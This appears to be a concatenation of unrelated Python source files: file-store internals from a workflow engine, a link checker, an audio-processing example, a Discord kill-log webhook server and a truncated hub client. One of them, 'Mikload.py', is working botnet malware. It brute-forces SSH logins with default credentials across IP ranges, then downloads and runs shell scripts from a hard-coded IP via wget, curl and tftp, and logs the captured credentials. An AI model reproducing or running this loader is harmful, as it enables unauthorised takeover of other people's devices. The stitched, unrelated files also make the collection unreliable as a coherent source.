# Remove the harbinger file
harbingerFile.delete()
except:
self._terminateEvent.set()
raise
def _updateJobWhenDone(self):
"""
Asynchronously update the status of the job on the disk, first waiting \
until the writing threads have finished and the input blockFn has stopped \
blocking.
"""
def asyncUpdate():
try:
# Wait till all file writes have completed
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
# Wait till input block-fn returns - in the event of an exception
# this will eventually terminate
self.inputBlockFn()
# Check the terminate event, if set we can not guarantee
# that the workers ended correctly, therefore we exit without
# completing the update
if self._terminateEvent.isSet():
raise RuntimeError("The termination flag is set, exiting before update")
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
finally:
# Indicate that _blockFn can return
# This code will always run
self.updateSemaphore.release()
# The update semaphore is held while the job is written to the job store
try:
self.updateSemaphore.acquire()
t = Thread(target=asyncUpdate)
t.start()
except:
# This is to ensure that the semaphore is released in a crash to stop a deadlock
# scenario
self.updateSemaphore.release()
raise
def _blockFn(self):
self.updateSemaphore.acquire()
self.updateSemaphore.release() # Release so that the block function can be recalled
# This works, because once acquired the semaphore will not be acquired
# by _updateJobWhenDone again.
return
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The directory that will contain the cache state file.
"""
cacheInfo = cls._CacheState._load(os.path.join(dir_, '_cacheState'))
cls.findAndHandleDeadJobs(cacheInfo, batchSystemShutdown=True)
shutil.rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.updateSemaphore.acquire()
for i in range(len(self.workers)):
self.queue.put(None)
for thread in self.workers:
thread.join()
self.updateSemaphore.release()
class NonCachingFileStore(FileStore):
def __init__(self, jobStore, jobGraph, localTempDir, inputBlockFn):
self.jobStore = jobStore
self.jobGraph = jobGraph
self.jobName = str(self.jobGraph)
self.localTempDir = os.path.abspath(localTempDir)
self.inputBlockFn = inputBlockFn
self.jobsToDelete = set()
self.loggingMessages = []
self.filesToDelete = set()
super(NonCachingFileStore, self).__init__(jobStore, jobGraph, localTempDir, inputBlockFn)
# This will be defined in the `open` method.
self.jobStateFile = None
self.localFileMap = defaultdict(list)
@contextmanager
def open(self, job):
jobReqs = job.disk
startingDir = os.getcwd()
self.localTempDir = makePublicDir(os.path.join(self.localTempDir, str(uuid.uuid4())))
self.findAndHandleDeadJobs(self.workFlowDir)
self.jobStateFile = self._createJobStateFile()
freeSpace, diskSize = getFileSystemSize(self.localTempDir)
if freeSpace <= 0.1 * diskSize:
logger.warning('Starting job %s with less than 10%% of disk space remaining.',
self.jobName)
try:
os.chdir(self.localTempDir)
yield
finally:
diskUsed = getDirSizeRecursively(self.localTempDir)
logString = ("Job {jobName} used {percent:.2f}% ({humanDisk}B [{disk}B] used, "
"{humanRequestedDisk}B [{requestedDisk}B] requested) at the end of "
"its run.".format(jobName=self.jobName,
percent=(float(diskUsed) / jobReqs * 100 if
jobReqs > 0 else 0.0),
humanDisk=bytes2human(diskUsed),
disk=diskUsed,
humanRequestedDisk=bytes2human(jobReqs),
requestedDisk=jobReqs))
self.logToMaster(logString, level=logging.DEBUG)
if diskUsed > jobReqs:
self.logToMaster("Job used more disk than requested. Consider modifying the user "
"script to avoid the chance of failure due to incorrectly "
"requested resources. " + logString, level=logging.WARNING)
os.chdir(startingDir)
jobState = self._readJobState(self.jobStateFile)
deferredFunctions = jobState['deferredFunctions']
failures = self._runDeferredFunctions(deferredFunctions)
for failure in failures:
self.logToMaster('Deferred function "%s" failed.' % failure, logging.WARN)
# Finally delete the job from the worker
os.remove(self.jobStateFile)
def writeGlobalFile(self, localFileName, cleanup=False):
absLocalFileName = self._resolveAbsoluteLocalPath(localFileName)
cleanupID = None if not cleanup else self.jobGraph.jobStoreID
fileStoreID = self.jobStore.writeFile(absLocalFileName, cleanupID)
self.localFileMap[fileStoreID].append(absLocalFileName)
return FileID.forPath(fileStoreID, absLocalFileName)
def readGlobalFile(self, fileStoreID, userPath=None, cache=True, mutable=False, symlink=False):
if userPath is not None:
localFilePath = self._resolveAbsoluteLocalPath(userPath)
if os.path.exists(localFilePath):
                raise RuntimeError('File %s exists. Cannot overwrite.' % localFilePath)
else:
localFilePath = self.getLocalTempFileName()
self.jobStore.readFile(fileStoreID, localFilePath, symlink=symlink)
self.localFileMap[fileStoreID].append(localFilePath)
return localFilePath
@contextmanager
def readGlobalFileStream(self, fileStoreID):
with self.jobStore.readFileStream(fileStoreID) as f:
yield f
def exportFile(self, jobStoreFileID, dstUrl):
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def deleteLocalFile(self, fileStoreID):
try:
localFilePaths = self.localFileMap.pop(fileStoreID)
except KeyError:
raise OSError(errno.ENOENT, "Attempting to delete a non-local file")
else:
for localFilePath in localFilePaths:
os.remove(localFilePath)
def deleteGlobalFile(self, fileStoreID):
try:
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# the file does not exist locally, so no local deletion necessary
pass
else:
raise
self.filesToDelete.add(fileStoreID)
def _blockFn(self):
# there is no asynchronicity in this file store so no need to block at all
return True
def _updateJobWhenDone(self):
try:
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
def __del__(self):
"""
Cleanup function that is run when destroying the class instance. Nothing to do since there
are no async write events.
"""
pass
# Functions related to the deferred function logic
@classmethod
def findAndHandleDeadJobs(cls, nodeInfo, batchSystemShutdown=False):
"""
Look at the state of all jobs registered in the individual job state files, and handle them
(clean up the disk, and run any registered defer functions)
:param str nodeInfo: The location of the workflow directory on the node.
:param bool batchSystemShutdown: Is the batch system in the process of shutting down?
:return:
"""
# A list of tuples of (job name, pid or process running job, registered defer functions)
for jobState in cls._getAllJobStates(nodeInfo):
if not cls._pidExists(jobState['jobPID']):
# using same logic to prevent races as CachingFileStore._setupCache
myPID = str(os.getpid())
cleanupFile = os.path.join(jobState['jobDir'], '.cleanup')
with open(os.path.join(jobState['jobDir'], '.' + myPID), 'w') as f:
f.write(myPID)
while True:
try:
os.rename(f.name, cleanupFile)
except OSError as err:
if err.errno == errno.ENOTEMPTY:
with open(cleanupFile, 'r') as f:
cleanupPID = f.read()
if cls._pidExists(int(cleanupPID)):
# Cleanup your own mess. It's only polite.
os.remove(f.name)
break
else:
os.remove(cleanupFile)
continue
else:
raise
else:
logger.warning('Detected that job (%s) prematurely terminated. Fixing the '
'state of the job on disk.', jobState['jobName'])
if not batchSystemShutdown:
logger.debug("Deleting the stale working directory.")
# Delete the old work directory if it still exists. Do this only during
                            # the life of the program and don't do it during the batch system
# cleanup. Leave that to the batch system cleanup code.
shutil.rmtree(jobState['jobDir'])
# Run any deferred functions associated with the job
logger.debug('Running user-defined deferred functions.')
cls._runDeferredFunctions(jobState['deferredFunctions'])
break
@staticmethod
def _getAllJobStates(workflowDir):
"""
Generator function that deserializes and yields the job state for every job on the node,
one at a time.
:param str workflowDir: The location of the workflow directory on the node.
:return: dict with keys (jobName, jobPID, jobDir, deferredFunctions)
:rtype: dict
"""
jobStateFiles = []
for root, dirs, files in os.walk(workflowDir):
for filename in files:
if filename == '.jobState':
jobStateFiles.append(os.path.join(root, filename))
for filename in jobStateFiles:
try:
yield NonCachingFileStore._readJobState(filename)
except IOError as e:
if e.errno == 2:
# job finished & deleted its jobState file since the jobState files were discovered
continue
else:
raise
@staticmethod
def _readJobState(jobStateFileName):
with open(jobStateFileName, 'rb') as fH:
state = dill.load(fH)
return state
def _registerDeferredFunction(self, deferredFunction):
with open(self.jobStateFile, 'rb') as fH:
jobState = dill.load(fH)
jobState['deferredFunctions'].append(deferredFunction)
with open(self.jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(self.jobStateFile + '.tmp', self.jobStateFile)
logger.debug('Registered "%s" with job "%s".', deferredFunction, self.jobName)
def _createJobStateFile(self):
"""
Create the job state file for the current job and fill in the required
values.
:return: Path to the job state file
:rtype: str
"""
jobStateFile = os.path.join(self.localTempDir, '.jobState')
jobState = {'jobPID': os.getpid(),
'jobName': self.jobName,
'jobDir': self.localTempDir,
'deferredFunctions': []}
with open(jobStateFile + '.tmp', 'wb') as fH:
dill.dump(jobState, fH)
os.rename(jobStateFile + '.tmp', jobStateFile)
return jobStateFile
@classmethod
def shutdown(cls, dir_):
"""
:param dir_: The workflow directory that will contain all the individual worker directories.
"""
cls.findAndHandleDeadJobs(dir_, batchSystemShutdown=True)
class FileID(str):
"""
A small wrapper around Python's builtin string class. It is used to represent a file's ID in the file store, and
has a size attribute that is the file's size in bytes. This object is returned by importFile and writeGlobalFile.
"""
def __new__(cls, fileStoreID, *args):
return super(FileID, cls).__new__(cls, fileStoreID)
def __init__(self, fileStoreID, size):
# Don't pass an argument to parent class's __init__.
# In Python 3 we can have super(FileID, self) hand us object's __init__ which chokes on any arguments.
super(FileID, self).__init__()
self.size = size
@classmethod
def forPath(cls, fileStoreID, filePath):
return cls(fileStoreID, os.stat(filePath).st_size)
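    # Illustrative use (hypothetical values): FileID('files/abc', 1024) compares and
    # hashes like the plain string 'files/abc' but also carries .size == 1024, and
    # FileID.forPath('files/abc', '/tmp/input.txt') fills the size in via os.stat().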
class WriteWatchingStream(object):
"""
A stream wrapping class that calls any functions passed to onWrite() with the number of bytes written for every write.
Not seekable.
"""
def __init__(self, backingStream):
"""
Wrap the given backing stream.
"""
self.backingStream = backingStream
# We have no write listeners yet
self.writeListeners = []
def onWrite(self, listener):
"""
Call the given listener with the number of bytes written on every write.
"""
self.writeListeners.append(listener)
# Implement the file API from https://docs.python.org/2.4/lib/bltin-file-objects.html
def write(self, data):
"""
Write the given data to the file.
"""
# Do the write
self.backingStream.write(data)
for listener in self.writeListeners:
# Send out notifications
listener(len(data))
def writelines(self, datas):
"""
Write each string from the given iterable, without newlines.
"""
for data in datas:
self.write(data)
def flush(self):
"""
Flush the backing stream.
"""
self.backingStream.flush()
def close(self):
"""
Close the backing stream.
"""
self.backingStream.close()
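# Illustrative sketch (hypothetical names): WriteWatchingStream can be used to count
# the bytes written through a wrapped stream, e.g.
#
#   written = [0]
#   stream = WriteWatchingStream(open('/tmp/out.bin', 'wb'))
#   stream.onWrite(lambda n: written.__setitem__(0, written[0] + n))
#   stream.write(b'hello')   # written[0] == 5 afterwards
#   stream.close()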
def shutdownFileStore(workflowDir, workflowID):
"""
Run the deferred functions from any prematurely terminated jobs still lingering on the system
and carry out any necessary filestore-specific cleanup.
This is a destructive operation and it is important to ensure that there are no other running
processes on the system that are modifying or using the file store for this workflow.
    This is intended to be the last call to the file store in a Toil run, called by the
batch system cleanup function upon batch system shutdown.
:param str workflowDir: The path to the cache directory
:param str workflowID: The workflow ID for this invocation of the workflow
"""
cacheDir = os.path.join(workflowDir, cacheDirName(workflowID))
if os.path.exists(cacheDir):
# The presence of the cacheDir suggests this was a cached run. We don't need the cache lock
# for any of this since this is the final cleanup of a job and there should be no other
# conflicting processes using the cache.
CachingFileStore.shutdown(cacheDir)
else:
# This absence of cacheDir suggests otherwise.
NonCachingFileStore.shutdown(workflowDir)
class CacheError(Exception):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
    message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
    Error raised if Toil detects that the user has deleted a cached file
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) deleted explicitly by user. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error Raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
|
snippet.py
|
from bs4 import BeautifulSoup,SoupStrainer
import urllib.request
import colorama,re,queue,threading
from colorama import Fore
from urllib.parse import *
class check_link():
def __init__(self,address):
self.address=address
def check(self,address):
try:
req=urllib.request.Request(url=address)
resp=urllib.request.urlopen(req)
            if resp.status in [400,404,403,408,409,501,502,503]: print (Fore.RED+str(resp.status)+"-"+resp.reason+"-->"+address)
else: print (Fore.GREEN+"no problem in-->"+address)
except Exception as e:
print (Fore.YELLOW+"{}-{}".format(e,address))
pass
def pattern_adjust(a, base):
    """Normalise a raw href/src value found on the page `base` to an absolute URL."""
    try:
        if re.match('^#', a):
            return 0  # in-page anchor, nothing to check
        r = urlsplit(a)
        if r.scheme == '' and r.netloc != '':
            # scheme-relative link (//host/path): assume https
            return "https://" + re.search(r'(?<=//)\S+', urlunsplit(r)).group(0)
        elif r.scheme == '':
            # relative path: resolve against the page it was found on
            return urljoin(base, a)
        else:
            return a
    except Exception:
        return 0
def extract_link(address):
tags= {'a':'href', 'img':'src', 'script':'src', 'link':'href' }
for key,value in iter(tags.items()):
try:
res=urllib.request.urlopen(address)
response=res.read().decode('utf-8') #needs improvement
for link in BeautifulSoup(response,"html.parser",parse_only=SoupStrainer(key)):
if link.has_attr(value):
                    p=pattern_adjust(link[value], address)
if p!=0 and str(p)!='None':
newcheck=check_link(p)
newcheck.check(p)
if p not in hyperlinks:
hyperlinks.add(p)
if website.split('.')[1] in p:#needs improvement
                                if not p.endswith(('.png','.jpeg','.js','.jpg')):
q.put(p)
except Exception as e:
print (e,address)
def threader():
while True:
value=q.get()
result=extract_link(value)
q.task_done()
if __name__=="__main__":
colorama.init()
q=queue.Queue()
global hyperlinks,website
hyperlinks=set()
website=input("Please enter the website address: ")
for x in range(30):
t=threading.Thread(target=threader)
        t.daemon=True
t.start()
q.put(website.strip())
q.join()
|
Mikload.py
|
#ulimit -n 999999
#Made simply for Kowai
#Made by slumptheogod @telnut on instagram
#line 86 is where u can edit ranges in the script Loli
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
blacklisted = ["127.0","10.0","192.168"] #You can these out add or whatever u want lol
#server_ip = useless atm
passwords = ["support:support"]
if sys.argv[4] == "root":
passwords = ["root:root"]
if sys.argv[4] == "guest":
passwords = ["guest:guest"]
if sys.argv[4] == "telnet":
passwords = ["telnet:telnet"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(1024))
if "SSH" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[1;35mInvalid \x1b[1;33m-- \x1b[1;35m" + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[1;37mAttempting Mikrotik \x1b[1;33m-- \x1b[1;35m" + ip + ":" + username + ":" + password + "\x1b[37m")
ssh.exec_command("cd /tmp; echo ''>DIRTEST || cd /var; echo ''>DIRTEST; wget http://104.248.251.125/8UsA.sh; curl -O http://104.248.251.125/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 104.248.251.125 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 104.248.251.125; chmod 777 t8UsA2.sh; sh t8UsA2.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh")
vulns = open("Mikrotik.txt", "a").write(username + ":" + password + ":" + ip + "\n") #This is not needed u can take it out if u want
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "KOWAI":
ranges = ["188.16.000.000/188.19.255.255/181.112.0.0/201.245.180.0/"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "KOWAI":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "KOWAI":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "KOWAI":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
|
example_SampleSplitter_bufferhandling.py
|
# -*- coding: utf-8 -*-
#pylint: disable-msg=E0611, E1101, C0103, R0901, R0902, R0903, R0904, W0232
#------------------------------------------------------------------------------
# Copyright (c) 2007-2021, Acoular Development Team.
#------------------------------------------------------------------------------
"""
This example shows the different behaviour of SampleSplitter class
when the maximum size of a block buffer is reached for one object obtaining
data.
Three different settings can be made by the user:
* none: no warning, no error
* warning: a warning appears
* error: an error is raised
"""
from acoular import TimePower, MaskedTimeSamples, SampleSplitter
import threading
from time import sleep
samples = 25000
# =============================================================================
# set up data source
# =============================================================================
h5savefile = 'example_data.h5'
ts = MaskedTimeSamples(name=h5savefile,
start = 0,
stop = samples)
# =============================================================================
# connect SampleSplitter to data source
# =============================================================================
# set up Sample Splitter
ss = SampleSplitter(source = ts)
# =============================================================================
# create two objects to process the data
# =============================================================================
tp1 = TimePower(source=ss)
tp2 = TimePower(source=ss)
# register these objects at SampleSplitter
ss.register_object(tp1,tp2) # register objects
# =============================================================================
# define functions
# =============================================================================
def print_number_of_blocks_in_block_buffers():
"""
prints the number of data blocks in SampleSplitter-buffers. For each
    subsequent object, a buffer exists.
"""
buffers = list(ss.block_buffer.values())
elements = [len(buf) for buf in buffers]
    print(f"num blocks in buffers: {dict(zip(['tp1','tp2'], elements))}")
def get_data_fast(obj): # not time consuming function
""" gets data fast (pause 0.1 seconds)"""
for _ in obj.result(2048): #
print("tp1 calls sample splitter")
print_number_of_blocks_in_block_buffers()
sleep(0.1)
def get_data_slow(obj): # more time consuming function
""" gets data slow (pause 0.8 seconds)"""
for i in obj.result(2048): #
        print("tp2 calls sample splitter")
print_number_of_blocks_in_block_buffers()
sleep(0.8)
# =============================================================================
# prepare and start processing in threads
# (no warning or error when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'none'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'none'
ss.buffer_overflow_treatment[tp2] = 'none'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
# =============================================================================
# prepare and start processing in threads
# (only warning when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'warning'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'warning'
ss.buffer_overflow_treatment[tp2] = 'warning'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
# =============================================================================
# prepare and start processing in threads
# (raise error when block buffer is full)
# =============================================================================
print("buffer overflow behaviour == 'error'")
print("buffer size is set to a maximum of 5 elements")
ss.buffer_size=5
ss.buffer_overflow_treatment[tp1] = 'error'
ss.buffer_overflow_treatment[tp2] = 'error'
worker1 = threading.Thread(target=get_data_fast, args=(tp1,))
worker2 = threading.Thread(target=get_data_slow, args=(tp2,))
print("start threads")
worker1.start()
worker2.start()
worker1.join()
worker2.join()
print("threads finished")
|
run.py
|
import base64
import datetime
import io
import json
import re
import socket
import sys
import threading
import zlib
from collections import defaultdict
from configparser import ConfigParser
from pathlib import Path
from socketserver import StreamRequestHandler
from socketserver import ThreadingTCPServer
from typing import Optional
from typing import Tuple
import discord
import logbook
import pytz
import requests
from PIL import Image
from discord import RequestsWebhookAdapter
from discord import Webhook
from logbook import Logger
from logbook.handlers import RotatingFileHandler
from logbook.handlers import StreamHandler
StreamHandler(
sys.stdout, level="INFO", bubble=True).push_application()
RotatingFileHandler(
"tklserver.log", level="INFO", bubble=True).push_application()
logger = Logger("tklserver")
logbook.set_datetime_format("local")
STEAM_PROFILE_URL = "https://www.steamcommunity.com/profiles/{id}"
DATE_FMT = "%Y/%m/%d - %H:%M:%S"
TKL_MSG_PAT = re.compile(
r"\(([0-9]{4}/[0-9]{2}/[0-9]{2}\s-\s[0-9]{2}:[0-9]{2}:[0-9]{2})\)\s'(.+)'\s"
r"\[(0x[0-9a-fA-F]+)\]\s(killed|teamkilled)\s'(.+)'\s\[(0x[0-9a-fA-F]+)\]\swith\s<(.+)>")
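# Illustrative line this pattern is written to match (values are hypothetical):
#   (2021/01/02 - 03:04:05) 'PlayerOne' [0x11000010abcdef] teamkilled 'PlayerTwo' [0x11000010fedcba] with <RifleDamage>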
class ImageCache:
def __init__(self, image_package: Path):
self._cache = {}
with image_package.open("rb") as f:
data = f.read()
data_decomp = zlib.decompress(data)
self._cache = json.loads(data_decomp)
def __getitem__(self, item):
if item is None:
item = "__DEFAULT"
image = self._cache[item]
if isinstance(image, io.BytesIO):
logger.info("returning cached image for: {i}", i=item)
image.seek(0)
return image
if image.startswith("__"):
image = image.split("__")[1]
return self.__getitem__(image)
logger.info("loading image for: {i}", i=item)
b64_img = io.BytesIO(base64.b64decode(image))
pil_image = Image.open(b64_img)
png_image = io.BytesIO()
pil_image.save(png_image, "PNG")
self._cache[item] = png_image
png_image.seek(0)
return png_image
class TKLServer(ThreadingTCPServer):
daemon_threads = True
def __init__(self, *args, stop_event: threading.Event,
discord_config: dict, image_cache: Optional[ImageCache] = None,
**kwargs):
super().__init__(*args, **kwargs)
self._stop_event = stop_event
self._discord_config = discord_config
self.image_cache = image_cache
@property
def stop_requested(self) -> bool:
return self._stop_event.is_set()
@property
def discord_config(self) -> dict:
return self._discord_config
def get_kill_icon(self, damage_type: str):
try:
return self.image_cache[damage_type]
except KeyError:
return None
class TKLRequestHandler(StreamRequestHandler):
def __init__(self, request, client_address, server: TKLServer):
self.server: TKLServer = server
super().__init__(request, client_address, server)
def execute_webhook(self, ident: str, msg: str):
embed: Optional[discord.Embed] = None
damage_type = ""
try:
msg_match = TKL_MSG_PAT.match(msg)
            if not msg_match:
                logger.warn("message does not match pattern")
            else:
                groups = msg_match.groups()
date = groups[0]
date = datetime.datetime.strptime(date, DATE_FMT)
date = date.astimezone(pytz.utc)
killer = groups[1]
killer_id = int(groups[2], 16)
killer_profile = STEAM_PROFILE_URL.format(id=killer_id)
killed = groups[4]
killed_id = int(groups[5], 16)
killed_profile = STEAM_PROFILE_URL.format(id=killed_id)
damage_type = groups[6]
killer = discord.utils.escape_mentions(killer)
killer = discord.utils.escape_markdown(killer)
killed = discord.utils.escape_mentions(killed)
killed = discord.utils.escape_markdown(killed)
action = groups[3]
if killed_id == killer_id:
action = "suicide"
damage_type = damage_type.replace("SUICIDE_", "")
action_formatted = {
"killed": "Kill",
"teamkilled": "Team Kill",
"suicide": "Suicide",
}[action]
color = {
"killed": 3066993,
"teamkilled": 15158332,
"suicide": 9807270,
}[action]
if killer_id == 0:
killer_id_link = "BOT"
else:
killer_id_link = f"[{killer_id}]({killer_profile})"
if killed_id == 0:
killed_id_link = "BOT"
else:
killed_id_link = f"[{killed_id}]({killed_profile})"
# Both are bots. Avoid false "Suicide".
if (killed_id == 0) and (killer_id == 0):
action_formatted = "Bot Killed Bot"
embed = discord.Embed(
title=action_formatted,
timestamp=date,
color=color,
).add_field(
name="Killer",
value=killer,
inline=True,
).add_field(
name="Victim",
value=killed,
inline=True,
).add_field(
name="\u200b",
value="\u200b",
).add_field(
name="Killer ID",
value=killer_id_link,
inline=True,
).add_field(
name="Victim ID",
value=killed_id_link,
inline=True,
).add_field(
name="\u200b",
value="\u200b",
).add_field(
name="Damage Type",
value=damage_type,
)
except Exception as e:
logger.error("error creating embed message: {e}",
e=e, exc_info=True)
webhook_id = self.server.discord_config[ident][0]
webhook_token = self.server.discord_config[ident][1]
webhook = Webhook.partial(
id=webhook_id, token=webhook_token, adapter=RequestsWebhookAdapter()
)
if embed is not None:
logger.info("sending webhook embed for {i}", i=ident)
try:
kill_icon = self.server.get_kill_icon(damage_type)
if kill_icon:
image_file = discord.File(kill_icon, filename="image.png")
embed.set_image(url="attachment://image.png")
webhook.send(file=image_file, embed=embed)
else:
webhook.send(embed=embed)
except Exception as e:
logger.error(e, exc_info=True)
else:
logger.info("sending webhook message for {i}", i=ident)
webhook.send(content=msg)
def handle(self):
try:
logger.info("connection opened from: {sender}",
sender=self.client_address)
while not self.server.stop_requested:
data = self.rfile.readline()
if data.startswith(b"\x00") or not data:
logger.info(
"received quit request from {sender}, closing connection",
sender=self.client_address)
break
logger.debug("raw data: {data}", data=data)
data = str(data, encoding="latin-1").strip()
ident = data[:4]
data = data[4:]
logger.debug("{i}: {data}", i=ident, data=data)
if ident in self.server.discord_config:
self.execute_webhook(ident, data)
else:
logger.error("server unique ID {i} not in Discord config", i=ident)
except (ConnectionError, socket.error) as e:
logger.error("{sender}: connection error: {e}",
sender=self.client_address, e=e)
except Exception as e:
logger.error("error when handling request from {addr}: {e}",
addr=self.client_address, e=e)
logger.exception(e)
def parse_webhook_url(url: str) -> Tuple[int, str]:
resp = requests.get(url).json()
_id = int(resp["id"])
token = resp["token"]
return _id, token
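# A GET on a Discord webhook URL returns the webhook object as JSON; only its
# "id" and "token" fields are needed here to build a discord.py Webhook partial.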
def load_config() -> dict:
cp = ConfigParser()
cp.read("tklserver.ini")
sections = cp.sections()
ret = defaultdict(dict, cp)
for section in sections:
if section.startswith("rs2server"):
ident = section.split(".")[1]
url = cp[section].get("webhook_url")
try:
ret["discord"][ident] = parse_webhook_url(url)
except Exception as e:
logger.error("webhook URL failure for RS2 server ID={i}: {e}",
i=ident, e=e)
return ret
def terminate(stop_event: threading.Event):
stop_event.set()
def main():
config = load_config()
image_cache = None
image_cache_path = Path("kill_icons.zlib")
try:
logger.info(f"attempting to load image cache from: {image_cache_path.absolute()}")
image_cache = ImageCache(image_cache_path)
logger.info("image cache loaded successfully")
except Exception as e:
logger.exception(f"error loading image cache: {e}")
try:
server_config = config["tklserver"]
port = server_config.getint("port")
host = server_config["host"]
if not port:
logger.error("port not set, exiting...")
sys.exit(-1)
except (ValueError, KeyError) as e:
logger.debug("invalid config: {e}", e=e, exc_info=True)
logger.error("invalid config, exiting...")
sys.exit(-1)
stop_event = threading.Event()
addr = (host, port)
server = None
try:
server = TKLServer(addr, TKLRequestHandler, stop_event=stop_event,
discord_config=config["discord"],
image_cache=image_cache)
logger.info("serving at: {host}:{port}", host=addr[0], port=addr[1])
logger.info("press CTRL+C to shut down the server")
server.serve_forever()
except KeyboardInterrupt:
logger.info("server stop requested")
finally:
if server:
t = threading.Thread(target=terminate, args=(stop_event,))
t.start()
t.join()
server.shutdown()
server.server_close()
logger.info("server shut down successfully")
if __name__ == "__main__":
main()
|
hub.py
|
import requests
import os
import threading
import binascii
import time
import sys
import logbook
logger = logbook.Logger(__name__)
class HubConn:
def __init__(self, host, port, username=None, password=None, poll_time=1, timeout=0.1):
self._host = host
self._port = port
self._username = username
